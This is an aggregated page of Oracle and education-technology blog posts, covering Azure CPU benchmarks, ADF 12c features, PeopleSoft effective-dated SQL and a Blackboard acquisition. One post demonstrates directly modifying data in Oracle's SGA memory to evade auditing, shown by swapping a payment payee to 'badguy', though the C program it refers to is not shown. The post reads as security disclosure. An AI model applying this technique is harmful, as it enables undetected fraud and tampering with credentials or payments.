In addition to standard instances, Microsoft makes available basic instances, which claim to offer “similar machine configurations as the Standard tier of instances offered today (Extra Small [A0] to Extra Large [A4]). These instances will cost up to 27% less than the corresponding instances in use today (which will now be called “Standard”) and do not include load balancing or auto-scaling, which are included in Standard” (http://azure.microsoft.com/blog/2014/03/31/microsoft-azure-innovation-quality-and-price/)

Having a look at throughput here, by creating a basic A3 instance “marc-cpu-basic” that otherwise matches exactly marc-cpu created earlier.

[azureuser@marc-cpu-basic ~]$ egrep '(processor|model name|cpu MHz|physical id|siblings|core id|cpu cores)' /proc/cpuinfo
processor       : 0
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.993
physical id     : 0
siblings        : 4
core id         : 0
cpu cores       : 4
processor       : 1
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.993
physical id     : 0
siblings        : 4
core id         : 1
cpu cores       : 4
processor       : 2
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.993
physical id     : 0
siblings        : 4
core id         : 2
cpu cores       : 4
processor       : 3
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.993
physical id     : 0
siblings        : 4
core id         : 3
cpu cores       : 4

CPU specs are identical to marc-cpu. Running the same tests:

[azureuser@marc-cpu-basic ~]$ taskset -pc 0 $$
pid 1566's current affinity list: 0-3
pid 1566's new affinity list: 0
[azureuser@marc-cpu-basic ~]$  dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null
2170552320 bytes (2.2 GB) copied, 54.6678 s, 39.7 MB/s
for i in {1..2}; do (dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null &) done
[azureuser@marc-cpu-basic ~]$ for i in {1..2}; do (dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null &) done
2170552320 bytes (2.2 GB) copied, 107.73 s, 20.1 MB/s
2170552320 bytes (2.2 GB) copied, 107.846 s, 20.1 MB/s

Now that’s very slow: even with the identical stated CPU specs as marc-cpu, marc-cpu-basic comes in with 33% less throughput.

Doing 20 runs in a rows:

[azureuser@marc-cpu-basic ~]$ taskset -pc 0-3 $$
pid 1566's current affinity list: 0
pid 1566's new affinity list: 0-3
[azureuser@marc-cpu-basic ~]$ for run in {1..20}; do
> for i in {1..2}; do dd if=/dev/zero bs=1M count=2070 2>> output | gzip -c > /dev/null & done
> wait
> done
...
[azureuser@marc-cpu-basic ~]$ cat output | awk '/copied/ {print $8}' | sort | uniq -c
      4 40.4
     15 40.5
     14 40.6
      7 40.7

Very consistent results, but consistently slow. They do show that cores aren’t being shared, but throughput is lower than even a shared core under AWS.

Wrapping up Comparison chart

Under this simple gzip test, we are testing CPU integer performance. The Azure standard instance got half the throughput of the equivalent AWS instance, in spite of a clock speed only 15% slower. But the throughput was consistent: no drops when running on adjacent cores. The basic instance was a further 33% slower than a standard instance, in spite of having the same CPU configuration.

Under Azure, we simply aren’t getting a full physical core’s worth of throughput. Perhaps the hypervisor is capping throughput, and capping even lower for basic instances? Or maybe the actual CPU is different than the E5-2660 reported? For integer CPU-bound workloads like our gzip test, we would need to purchase at least twice as much capacity under Azure than AWS, making Azure considerably more expensive as a platform.

Categories: DBA Blogs

Direct update of Oracle data in SGA to avoid audit.

ContractOracle - Thu, 2014-07-10 04:42
Vendors sell some rather expensive software for auditing Oracle database, and coding applications to ensure an audit trail, but the truth is that anyone logged into the database server as the owner of the database can directly modify data in datafiles, or even in memory.

I previously demonstrated using BBED to update blocks in datafiles, but it was necessary to update block checksums and flush the buffer cache to activate the changes.  Modifying data in SGA directly is easier, and leaves less evidence.  
It seems that once data is read into the SGA, Oracle does not use checksums to look for corruption, and it is also possible to modify uncommitted data.  I have written a simple C program to update SGA directly.
Here is one example demonstrating how even uncommitted data can be updated in the SGA.  The same thing can be done to any data in the SGA, including password hashes, credit card numbers, email addresses etc.
PDB1@ORCL> create table payment_batch (payee char(6));
Table created.
PDB1@ORCL> insert into payment_batch values ('vendor');
1 row created.
PDB1@ORCL> select * from payment_batch;
PAYEE------badguy
PDB1@ORCL> commit;
Commit complete.
PDB1@ORCL> alter system flush buffer_cache;
System altered.
PDB1@ORCL> select * from payment_batch;
PAYEE------badguy
You can see that in the middle of this transaction it was possible to modify the in-flight data stored in SGA, which was then committed to disk.  This was done via a direct update to SGA records on the DB server.
Categories: DBA Blogs

ADF 12c (12.1.3) New Feature - ADF Query Item Reordering and Custom Operators

Andrejus Baranovski - Thu, 2014-07-10 01:21
There are quite many new features in ADF 12c (12.1.3). One of them - ADF Query item reordering on runtime, user can choose the order to display criteria items displayed in ADF Query. View Criteria wizard in JDeveloper is updated, besides Criteria UI Hints (as we had before), now developer have access to Item UI Hints (here you can set item visibility, multiple values selection and removable support). Important addition - new tab in the wizard to define and manage Custom Operators for View Criteria items (this was possible before directly in the source code, now we have a wizard).

Here you can see new View Criteria wizard in ADF 12c (12.1.3) with UI Hints tab for each criteria item. I have set First Name criteria item to be rendered only in Advanced mode, also with removable option:


Custom Operators tab allows to create new operator or update/remove existing one, very useful feature to manage criteria search options:


ADF Query UI remains unchanged (by the way, First Name is not rendered in basic mode as it should):


Go to advanced mode - First Name is rendered now. There is additional button - Reorder. New functionality in ADF Query 12c (12.1.3):


Reorder brings a popup with ADF Query items, user can move Email to be the first item:


ADF Query is updated with the change - Email item is the first:


Even after returning to basic mode - order remains. I believe this will be quite useful functionality, especially for large ADF Query blocks with many criteria items:


Download sample application - ADF12cQueryApp.zip.

Introducing the Analytic Keep Clause for Effective-Dated/Sequence Queries in PeopleSoft

David Kurtz - Wed, 2014-07-09 12:46
Those of us who work with PeopleSoft, and especially the HCM product, are all too familiar with the concept of effect-dated data, and the need to find data that was effective at a particular date.  PeopleSoft products have always made extensive use of correlated sub-queries to determine the required rows from an effective-dated record.

The JOB record is a the heart of HCM. It is both effective-dated and effective sequenced. I will use it for the demonstrations in this article. I am going to suggest an alternative, although Oracle-specific, SQL construction.

 Let's start by looking at the job data for an employee in the demo database. Employee KF0018 has 17 rows of data two concurrent jobs.  The question I am going to ask is "What was the annual salary for this employee on 11 February 1995?".  Therefore, I am interested in the rows marked below with the asterisks. 
column annual_rt format 999,999
SELECT emplid, empl_rcd, effdt, effseq, action, deptid, currency_cd, annual_rt
FROM ps_job j
WHERE j.emplid = 'KF0018'
ORDER BY 1,2,3,4
/

EMPLID        EMPL_RCD EFFDT         EFFSEQ ACT DEPTID     CUR ANNUAL_RT
----------- ---------- --------- ---------- --- ---------- --- ---------
KF0018 0 12-JUN-83 0 HIR 13000 FRF 120,000
KF0018 0 01-JAN-84 0 PAY 13000 FRF 123,600
KF0018 0 01-JAN-85 0 PAY 13000 FRF 127,308
KF0018 0 01-JAN-86 0 PAY 13000 FRF 131,764
KF0018 0 01-JAN-87 0 PAY 13000 FRF 136,376
KF0018 0 01-JAN-88 0 PAY 13000 FRF 140,467
KF0018 0 01-JAN-89 0 PAY 13000 FRF 147,490
KF0018 0 22-JAN-95 0 PRO 13000 FRF 147,490
KF0018 0 22-JAN-95 1 PAY 13000 FRF 294,239 *
KF0018 0 22-JAN-96 0 PAY 13000 FRF 318,575
KF0018 0 01-JAN-98 0 PAY 13000 FRF 346,156
KF0018 0 01-JAN-00 0 DTA 13000 FRF 346,156
KF0018 0 01-JAN-02 0 PAY 13000 EUR 52,771
KF0018 1 01-NOV-89 0 ASG 21300 GBP 22,440
KF0018 1 31-DEC-93 0 ASC 21300 GBP 22,440
KF0018 1 01-JAN-94 0 ASG 12000 GBP 22,440 *
KF0018 1 31-DEC-95 0 ASC 10000 GBP 22,440

I will set statistics level to ALL so I can obtain detailed information about how the SQL statements execute:
ALTER SESSION SET statistics_level = ALL;

I extracted the execution plans and execution statistics with the following command
select * from table(dbms_xplan.display_cursor(null,null,'IOSTATS')) 
Typical PeopleSoft Platform Agnostic ConstructionThis is the usual way to construct the query in PeopleSoft. It is also valid on all databases platforms supported by PeopleSoft, not just Oracle. 
SELECT  emplid, empl_rcd, effdt, effseq, action, deptid, currency_cd, annual_rt
FROM ps_job j
WHERE j.effdt = (
SELECT MAX (j1.effdt) FROM ps_job j1
WHERE j1.emplid = j.emplid
AND j1.empl_rcd = j.empl_rcd
AND j1.effdt <= TO_DATE('19950211','YYYYMMDD'))
AND j.effseq = (
SELECT MAX (j2.effseq) FROM ps_job j2
WHERE j2.emplid = j.emplid
AND j2.empl_rcd = j.empl_rcd
AND j2.effdt = j.effdt)
AND j.emplid = 'KF0018'
ORDER BY 1,2,3,4
/

EMPLID        EMPL_RCD EFFDT         EFFSEQ ACT DEPTID     CUR ANNUAL_RT
----------- ---------- --------- ---------- --- ---------- --- ---------
KF0018 0 22-JAN-95 1 PAY 13000 FRF 294,239
KF0018 1 01-JAN-94 0 ASG 12000 GBP 22,440

This required three access of indexes on the PS_JOB table, and two accesses of the table, using 26 consistent reads.
Plan hash value: 2299825310
----------------------------------------------------------------------------------------------------------------
| Id | Operation | Name | Starts | E-Rows | A-Rows | A-Time | Buffers | Reads |
----------------------------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | | 2 |00:00:00.01 | 26 | 2 |
| 1 | SORT ORDER BY | | 1 | 1 | 2 |00:00:00.01 | 26 | 2 |
| 2 | NESTED LOOPS | | 1 | 1 | 2 |00:00:00.01 | 26 | 2 |
| 3 | NESTED LOOPS | | 1 | 1 | 3 |00:00:00.01 | 21 | 2 |
| 4 | VIEW | VW_SQ_1 | 1 | 1 | 2 |00:00:00.01 | 14 | 2 |
|* 5 | FILTER | | 1 | | 2 |00:00:00.01 | 14 | 2 |
| 6 | HASH GROUP BY | | 1 | 1 | 2 |00:00:00.01 | 14 | 2 |
| 7 | TABLE ACCESS BY INDEX ROWID| PS_JOB | 1 | 1 | 12 |00:00:00.01 | 14 | 2 |
|* 8 | INDEX RANGE SCAN | PS_JOB | 1 | 1 | 12 |00:00:00.01 | 2 | 2 |
| 9 | TABLE ACCESS BY INDEX ROWID | PS_JOB | 2 | 1 | 3 |00:00:00.01 | 7 | 0 |
|* 10 | INDEX RANGE SCAN | PSAJOB | 2 | 1 | 3 |00:00:00.01 | 4 | 0 |
|* 11 | VIEW PUSHED PREDICATE | VW_SQ_2 | 3 | 1 | 2 |00:00:00.01 | 5 | 0 |
|* 12 | FILTER | | 3 | | 3 |00:00:00.01 | 5 | 0 |
| 13 | SORT AGGREGATE | | 3 | 1 | 3 |00:00:00.01 | 5 | 0 |
|* 14 | FILTER | | 3 | | 5 |00:00:00.01 | 5 | 0 |
|* 15 | INDEX RANGE SCAN | PSAJOB | 3 | 1 | 5 |00:00:00.01 | 5 | 0 |
----------------------------------------------------------------------------------------------------------------

Predicate Information (identified by operation id):
---------------------------------------------------

5 - filter("J1"."EMPLID"='KF0018')
8 - access("J1"."EMPLID"='KF0018' AND "J1"."SYS_NC00164$">=HEXTORAW('883CFDF4FEF8FEFAFF') )
filter(SYS_OP_UNDESCEND("J1"."SYS_NC00164$")<=TO_DATE(' 1995-02-11 00:00:00', 'syyyy-mm-dd
hh24:mi:ss'))
10 - access("J"."EMPLID"='KF0018' AND "ITEM_2"="J"."EMPL_RCD" AND
"J"."SYS_NC00164$"=SYS_OP_DESCEND("MAX(J1.EFFDT)"))
filter(SYS_OP_UNDESCEND("J"."SYS_NC00164$")="MAX(J1.EFFDT)")
11 - filter(SYS_OP_UNDESCEND("J"."SYS_NC00165$")="MAX(J2.EFFSEQ)")
12 - filter(COUNT(*)>0)
14 - filter('KF0018'="J"."EMPLID")
15 - access("J2"."EMPLID"='KF0018' AND "J2"."EMPL_RCD"="J"."EMPL_RCD" AND
"J2"."SYS_NC00164$"=SYS_OP_DESCEND(SYS_OP_UNDESCEND("J"."SYS_NC00164$")))
filter(SYS_OP_UNDESCEND("J2"."SYS_NC00164$")=SYS_OP_UNDESCEND("J"."SYS_NC00164$"))

This construction is also the reason you are required to set
_UNNEST_SUBQUERY=FALSE
on all PeopleSoft systems
Analytic Function and In-LineView/Sub-query FactorI have seen people use a combination of analytic functions and in-line views to avoid having to use the correlated sub-query construction. This has been possible since Oracle 9i.
WITH X AS (
SELECT emplid, empl_rcd, effdt, effseq, action, deptid, currency_cd, annual_rt
, ROW_NUMBER() OVER (PARTITION BY emplid, empl_rcd 
ORDER BY effdt DESC, effseq DESC) myrowseq
FROM ps_job j
WHERE j.effdt <= TO_DATE('19950211','YYYYMMDD')
AND j.emplid = 'KF0018'
)
SELECT emplid, empl_rcd, effdt, effseq, action, deptid, currency_cd, annual_rt
FROM x
WHERE myrowseq = 1
ORDER BY 1,2,3,4
/

EMPLID        EMPL_RCD EFFDT         EFFSEQ ACT DEPTID     CUR ANNUAL_RT
----------- ---------- --------- ---------- --- ---------- --- ---------
KF0018 0 22-JAN-95 1 PAY 13000 FRF 294,239
KF0018 1 01-JAN-94 0 ASG 12000 GBP 22,440

We get the same result, but now the index is scanned just once and we only need 14 consistent reads, so it produces a significant improvement. However, it still includes a sort operation in addition to the window function. We have to create a sequence number field in the in-line view and filter by that in the final query.
Plan hash value: 1316906785
---------------------------------------------------------------------------------------------------
| Id | Operation | Name | Starts | E-Rows | A-Rows | A-Time | Buffers |
---------------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | | 2 |00:00:00.01 | 14 |
| 1 | SORT ORDER BY | | 1 | 1 | 2 |00:00:00.01 | 14 |
|* 2 | VIEW | | 1 | 1 | 2 |00:00:00.01 | 14 |
|* 3 | WINDOW NOSORT | | 1 | 1 | 12 |00:00:00.01 | 14 |
| 4 | TABLE ACCESS BY INDEX ROWID| PS_JOB | 1 | 1 | 12 |00:00:00.01 | 14 |
|* 5 | INDEX RANGE SCAN | PSAJOB | 1 | 1 | 12 |00:00:00.01 | 2 |
---------------------------------------------------------------------------------------------------

Predicate Information (identified by operation id):
---------------------------------------------------

2 - filter("MYROWSEQ"=1)
3 - filter(ROW_NUMBER() OVER ( PARTITION BY "EMPLID","EMPL_RCD" ORDER BY
"J"."SYS_NC00164$","J"."SYS_NC00165$")<=1)
5 - access("J"."EMPLID"='KF0018' AND "J"."SYS_NC00164$">=HEXTORAW('883CFDF4FEF8FEFAFF')
)
filter(SYS_OP_UNDESCEND("J"."SYS_NC00164$")<=TO_DATE(' 1995-02-11 00:00:00',
'syyyy-mm-dd hh24:mi:ss'))

Analytic Function Keep Clause This form of the analytic functions is documented for the first time in 12c, but is available in 10g (my thanks to Tony Hasler for introducing me to it). It works by effectively keeping a running maximum value of the columns in the order by clause within in group.
SELECT emplid, empl_rcd
, MAX(effdt) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq) AS effdt
, MAX(effseq) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq) AS effseq
, MAX(action) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq) AS action
, MAX(deptid) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq) AS deptid
, MAX(currency_cd) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq) AS currency_cd
, MAX(annual_rt) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq) AS annual_rt
FROM ps_job j
WHERE j.effdt <= TO_DATE('19950211','YYYYMMDD')
AND j.emplid = 'KF0018'
GROUP BY emplid, empl_rcd
/

EMPLID        EMPL_RCD EFFDT         EFFSEQ ACT DEPTID     CUR ANNUAL_RT
----------- ---------- --------- ---------- --- ---------- --- ---------
KF0018 0 22-JAN-95 1 PAY 13000 FRF 294,239
KF0018 1 01-JAN-94 0 ASG 12000 GBP 22,440

Although this construction uses an additional consistent read, it has the advantage of not using either an inline view or a window function and does not sort the data.
Plan hash value: 1550496807
-------------------------------------------------------------------------------------------------
| Id | Operation | Name | Starts | E-Rows | A-Rows | A-Time | Buffers |
-------------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | | 2 |00:00:00.01 | 15 |
| 1 | SORT GROUP BY NOSORT | | 1 | 1 | 2 |00:00:00.01 | 15 |
| 2 | TABLE ACCESS BY INDEX ROWID| PS_JOB | 1 | 1 | 12 |00:00:00.01 | 15 |
|* 3 | INDEX RANGE SCAN | PS_JOB | 1 | 1 | 12 |00:00:00.01 | 3 |
-------------------------------------------------------------------------------------------------

Predicate Information (identified by operation id):
---------------------------------------------------

3 - access("J"."EMPLID"='KF0018' AND "J"."SYS_NC00164$">=HEXTORAW('883CFDF3FEF8FEFAFF'
) )
filter(SYS_OP_UNDESCEND("J"."SYS_NC00164$")<=TO_DATE(' 1995-02-12 00:00:00',
'syyyy-mm-dd hh24:mi:ss'))

I think this construction could be useful in PeopleSoft.  At first glance the SQL appears more complicated, but it in this example it removed two correlated sub-queries. 
Using Analytic Functions in PS/QueryOf course you can code it anywhere where you can simply enter SQL as text.  However, it also has the advantage over the other analytic function construction that it can be coded in the PS/Query tool.  The analytic functions in the select caluse should be created in PS/Query expressions with the aggregate expression checkbox ticked.
Analytic 'Keep' function in PS/Query Aggregate ExpressionAnalytic Function in Aggregated Expression in Windows Client version of PS/Query  The analytic functions can be selected in the PS/Query, and their lengths and titles can be tidied up.
Analytic PS/QueryPS/Query with Analytic 'Keep' Functions
This is the resulting SQL which is the same as before (with row level security added by PS/Query) and produces the same results.
SELECT A.EMPLID, A.EMPL_RCD, MAX(effdt) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq)
, MAX(effseq) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq), MAX(action) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq), MAX(deptid) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq), MAX(currency_cd) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq), MAX(annual_rt) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq)
FROM PS_JOB A, PS_EMPLMT_SRCH_QRY A1
WHERE ( A.EMPLID = A1.EMPLID
AND A.EMPL_RCD = A1.EMPL_RCD
AND A1.OPRID = 'PS'
AND ( A.EFFDT <= TO_DATE('1995-02-11','YYYY-MM-DD')
AND A.EMPLID = 'KF0018' ) )
GROUP BY A.EMPLID, A.EMPL_RCD
©David Kurtz, Go-Faster Consultancy Ltd.

ADF Faces Responsive Design - 12.1.3 Update

Shay Shmeltzer - Wed, 2014-07-09 10:40

I while back I blogged about a technique for doing responsive design with JDeveloper 12.1.2 using media queries and css, but it is time for a small update for those who are using 12.1.3 - since there are some new capabilities that you can leverage.  (I would still recommend watching the other video as it shows some other things you can do with the same technique like changing the size of icons/fonts).

The major change in 12.1.3 is that you can now include your media query and style classes inside the skin definition. When you combine this with page templates you get very clean pages that don't need to include code for responsiveness.

See the demo below for how it works.

One note - in the houses demo I actually used a region that is replicated on the left side and in the panel drawer. This way you only need to code that part once.

Here is the code for the skin's css file:

.wide {

    display: inline;

}


.narrow {

    display: none;

}

@media screen and (max-width:950px) {

            .narrow {

                display: inline;

            }

            .wide {

                display: none;

            }

        }

And here is the code for the page template:

 <?xml version='1.0' encoding='UTF-8'?>

<af:pageTemplateDef xmlns:af="http://xmlns.oracle.com/adf/faces/rich" var="attrs" definition="private"

                    xmlns:afc="http://xmlns.oracle.com/adf/faces/rich/component">

    <af:xmlContent>

        <afc:component>

            <afc:description/>

            <afc:display-name>collapseTemplate</afc:display-name>

            <afc:facet>

                <afc:facet-name>right</afc:facet-name>

            </afc:facet>

            <afc:facet>

                <afc:facet-name>drawer</afc:facet-name>

            </afc:facet>

            <afc:facet>

                <afc:facet-name>center</afc:facet-name>

            </afc:facet>

        </afc:component>

    </af:xmlContent>

    <af:panelGridLayout id="pt_pgl1">

        <af:gridRow marginTop="5px" height="auto" marginBottom="5px" id="pt_gr1">

            <af:gridCell marginStart="5px" width="20%" id="pt_gc1" >

            <af:panelGroupLayout layout="vertical" styleClass="wide">

                <af:facetRef facetName="right"/>

                </af:panelGroupLayout>

            </af:gridCell>

            <af:gridCell marginStart="5px" marginEnd="5px" width="80%" id="pt_gc2">

                <af:facetRef facetName="center"/>

            </af:gridCell>

            <af:gridCell  halign="stretch" width="auto" id="pt_gc3" >

            <af:panelGroupLayout layout="vertical" styleClass="narrow">

                <af:panelDrawer  id="pt_pd1" height="500px">

                    <af:showDetailItem id="dr1" shortDesc="Drawer 1">

                        <af:facetRef facetName="drawer"/>

                    </af:showDetailItem>

                </af:panelDrawer>

                </af:panelGroupLayout>

            </af:gridCell>

        </af:gridRow>

    </af:panelGridLayout>

</af:pageTemplateDef>

As before you should also be setting the web.xml contextual parameter org.apache.myfaces.trinidad.DISABLE_CONTENT_COMPRESSION  =  true

Categories: Development

Oracle Secure Enterprise Search Deployment Considerations for PeopleSoft 9.2

PeopleSoft Technology Blog - Wed, 2014-07-09 10:16

Oracle Secure Enterprise Search (SES) is the search engine on which the PeopleSoft Search Framework relies. Here is a comprehensive set of resources on My Oracle Support that provide information on the essential hardware for Oracle SES to help ensure capacity for peak concurrent usage of your PeopleSoft 9.2 environment. When planning your PeopleSoft 9.2 installation, follow these recommendations to insure the best possible performance and stability for your PeopleSoft environment.


Blackboard’s Perceptis Acquisition Offers Clues into Company’s Strategy

Michael Feldstein - Wed, 2014-07-09 08:47

Yesterday Blackboard announced that they acquired Perceptis, a provider of help desk and financial aid support services for colleges and universities. In and of itself, this is not a huge acquisition. Perceptis has 33 clients, offers services that Blackboard was already offering, and has no substantial new technology. But as we approach BbWorld next week, the move provides some early hints into the strategic direction that the company may highlight at the conference.

I had the opportunity to talk with Blackboard’s Vice President of Education Services Katie Blot about the move.

There are a couple of different ways to frame help desk services, so I was curious to hear how Blackboard would position it. Katie talked about being “very, very focused on end-to-end learner-centric support” and “supporting learner pathways” for “non-traditional and post-traditional students.” And in the acquisition announcement, Jay Bhatt is quoted as saying,

By combining the Blackboard and Perceptis teams, we will enhance a service model that the industry needs: one that fully supports students from the first moment they are interested in a school to the day they graduate. This is yet another way Blackboard is reimagining education.

While “reimagining education” may be laying it on a little thick in the context of acquiring a help desk service, the reframing of the company mission as supporting students from orientation to graduation is a significant change. I always got the feeling that former CEO Michael Chasen’s role model was Oracle’s Larry Ellison. If you need a piece of software to help you do something important, Ellison will get it and sell it to you. It doesn’t matter too much what kind of software it is, as long as you’re the kind of customer he wants to have. There’s nothing wrong with that per se, but it leads to particular types of business decisions. A friend who used to work at Georgetown University liked to joke that Blackboard probably had some useful insights about his bowel health because he had to swipe his Blackboard-vended key card every time he used the faculty bathroom. Barring an uncommonly expansive definition of what it means to “fully support students,” this is just not the kind of business that the company Jay Bhatt is describing would be likely to get into (although, for the record, Blackboard currently still owns this business).

Interestingly, this is a point that Katie brought up unprompted. She took great pains to emphasize how they are building a “new Blackboard” (which, by implication, is importantly not like the old Blackboard). In the old days, she said, the company made acquisition decisions based primarily on the financial case. “We bought a lot of companies that were not closely aligned with the core.” I would put it slightly differently. I would say that Blackboard did not have the same core that the company leadership is articulating today.

And what is that core? What is the company trying to become? We will likely know more after next week, but by doubling down on the support services and positioning it the way they are, the company is trying to move up the value chain, away from being perceived as a software vendor and toward being perceived as a student success-related services vendor. According to Katie, their services business as tripled in the three years since Chasen got Blackboard into the call center support business by acquiring Presidium. The Perceptis move can be seen as doubling down. This puts them in an increasingly crowded space, particularly in online education, with competitors that range from Pearson to 2U to Hobsons. When I asked Katie how the company intends to differentiate itself, she cited two factors. First, they provide an a la carte approach and are avoiding making moves that they believe would potentially either put them in direct competition with their customers or otherwise cannibalize the schools’ core competencies. They are staying out of certain services businesses—she didn’t specify, but I imagine that curriculum development is a good example of what she means—while in others she said they take a “teach to fish” approach, moving more toward the consulting than the outsourcing range of the spectrum. This is not terribly different from the marketing message that Instructure deployed against the MOOC providers when announcing the Canvas Network and may be effective against the textbook publishers and more full-service outsourcing companies.

The second differentiator was interesting too. While Katie emphasized the a la carte message and specifically mentioned that Perceptis was attractive to the company because it served non-Blackboard customers and reinforced the message that they want to provide services to schools using other LMSs, she also said that Blackboard’s knowledge of the learning technology stack and, more importantly, the learning data, gives them an edge helping support their customers in making data-driven decisions. There aren’t many service providers who can make that claim right now. To be honest, I’m not sure that Blackboard can either yet. As I have written previously, the heritage of Blackboard’s analytics product is not really with learning analytics and they are still in the early stages of moving into this space. That said, Phil and I are impressed with their decision to hire John Whitmer as Director for Platform Analytics and Educational Research. As Phil has observed, Instructure has gotten strong benefits from hiring academic Jared Stein. Likewise, Al Essa led some pretty major conceptual work on analytics at Desire2Learn before they lost him to McGraw Hill. John is a solid researcher in the field of learning analytics and just the sort of guy that Blackboard needs to help them figure out how to deliver on their claims that they understand how educational data can provide insights enabling better student support.

Obviously, I’m reading tea leaves here. Speaking of data, Phil and I will both be at BbWorld next week and should have more concrete moves by Blackboard to analyze.

The post Blackboard’s Perceptis Acquisition Offers Clues into Company’s Strategy appeared first on e-Literate.

Hurricane season: The need for disaster recovery

Chris Foot - Wed, 2014-07-09 07:42

As hurricane season gets longer and businesses grow more reliant on technology, having a smart disaster recovery plan in place is essential. A major part of maintaining database security involves ensuring that the system can be rebooted or accessed in the event of a major power outage. 

Not prepared 
Eric Webster, a contributor to Channel Partners Online, referenced a survey of 600 small and medium-sized businesses conducted by Alibaba.com, Vendio, and Auctiva in 2013, noting that 74 percent of respondents have no DR/business continuity plan in place. Another 71 percent of SMBs lack a backup generator to keep the data center running. 

Essentially, this means that a large number of enterprises won't be able to conduct any activities in the event their operations shut down. Because technology is so heavily integrated into day-to-day workflows, professionals don't realize how mission critical databases are until they can't be accessed anymore. 

Battening down the hatches 
So, what can be done to prepare for a data center outage? TechRadar noted that implementing a DR/BC strategy involves a step-by-step process:

  1. If working with a cloud services provider, partner with a company known for building accessible, recoverable infrastructures.
  2. Set up data centers in easily reachable, strategically placed locations to exercise a low risk of failure.
  3. Figure out whether a dedicated communications link or a virtual private network is the best way to connect with databases.
  4. Regularly conduct tests on the system, which should be measured by performance and task completion. 

Outsourcing responsibility 
Webster acknowledged the benefits of hiring a remote database support service to initiate DR/BC tests, manage and organize recovery strategies and monitor databases 24/7/365. 

The key advantage of outsourcing to a managed services provider is that in the event a major storm is forecasted, database administrators can quickly implement backup strategies so that applications, stored information and platforms aren't lost. 

Another "aaS" 
With DBAs in mind, it's important to acknowledge that many such professionals now offer Recovery-as-a-Service, working with cloud environments to launch and maintain DR/BC. Webster outlined how this process works:

  • An enterprise's tangible and/or virtual databases deliver images of their environments to the cloud on a regular basis
  • If a super storm shuts down a data center, its virtual version can be maintained by and accessed through the cloud environment. 

Webster acknowledged that this service model is more affordable than conventional DR/BC strategies. Recovery can occur more quickly and separate hard disks containing data identical to the information in on-premise servers don't need to be used. 

The post Hurricane season: The need for disaster recovery appeared first on Remote DBA Experts.

in memory option

Laurent Schneider - Wed, 2014-07-09 05:12

Oracle 12cR1 patchset 1 is due this month and there is a new parameter that you can set to boost your performance. It is a bit of a SET "_FAST"=true parameter.

The in memory parameter is part of the sga. It is not mandatory to size it correctly, even if you do not have enough memory to hold your complete database, you can still play around with this parameter.

In a way, alter table t inmemory reminds me to the Oracle 8i alter table t cache and the Oracle 9i alter table t storage (buffer_pool keep).

But it is not free, I expect something close to the partitioning option, and it surely requires Enterprise Edition.

And also Oracle makes big noise about it, experts talk about a 1000x improvement, watch Database Industry Experts Discuss Oracle Database In-Memory.

The in memory cache is redundant with the database cache. It stores columns instead of blocks (or even results with the RESULT CACHE in 11g)

Don’t miss the Oracle Blog of @db_inmemory

Providing in-memory database is also positioning against HANA, a SAP in memory database. From OTN : Oracle Database In-Memory
Versus SAP HANA

A few years ago, Oracle acquired TimesTen. TimesTen is an in-memory database that works differently, where you can have fast response time (microseconds?) and could lose transactions (better faster than zero-data-loss). While TimesTen improves transaction speed, inMemory mostly improves queries (not writes).

Invoker Rights in Oracle Database 12c : Some more articles

Tim Hall - Wed, 2014-07-09 05:03

I wrote about the Code Based Access Control (CBAC) stuff in Oracle Database 12c a while back.

I’ve recently “completed the set” by looking at the INHERIT PRIVILEGES and BEQUEATH CURRENT_USER stuff for PL/SQL code and views respectively.

It’s pretty cool, but I’m not sure how much of it I will see in the wild as it will require developers to do a bit more thinking, rather than doing what they’ve always done… :)

Cheers

Tim…

Invoker Rights in Oracle Database 12c : Some more articles was first posted on July 9, 2014 at 12:03 pm.
©2012 "The ORACLE-BASE Blog". Use of this feed is for personal non-commercial use only. If you are not reading this article in your feed reader, then the site is guilty of copyright infringement.

12c Index Like Table Statistics Collection (Wearing The Inside Out)

Richard Foote - Wed, 2014-07-09 02:14
This change introduced in 12c has caught me out on a number of occasions. If you were to create a new table: And then populate it with a conventional insert: We find there are no statistics associated with the table until we explicitly collect them: But if we were to now create an index on this […]
Categories: DBA Blogs

Roundtable Discussion on Integrative Education July 9th at 2pm EDT

Michael Feldstein - Tue, 2014-07-08 16:19

Tomorrow, July 9th at 2:00pm EDT, I’ll join a great cast to discuss Reinvent the University for the Whole Person: Principles Driving Policy, and I hope many of you can watch. The other participants:

  • Randy Bass (Vice Provost for Education and Professor of English at Georgetown University)
  • Martha Kanter (Distinguished Visiting Professor of Higher Education at New York University & former U.S. Under Secretary of Education)
  • Robert Groves (Provost at Georgetown University)
  • Jeffrey Selingo (Author of College (Un)Bound: The Future of Higher Education and What It Means for Students)
  • Tia Brown McNair (Senior Director for Student Success at the Association of American Colleges & Universities)
  • Anthony Carnevale (Director of the Center on Education & the Workforce at Georgetown University)

Reinventors

The core idea for the series:

American higher education rarely has been more in the national spotlight than with the arrival of new digital technologies and new for-profit education businesses, among other big trends. In this rapidly changing landscape, the old model looks increasingly outmoded and many efforts are underway to begin to transform the system for the 21st century. Most efforts are focusing on making the system more efficient and producing a larger number of graduates to fit in a changing economy.

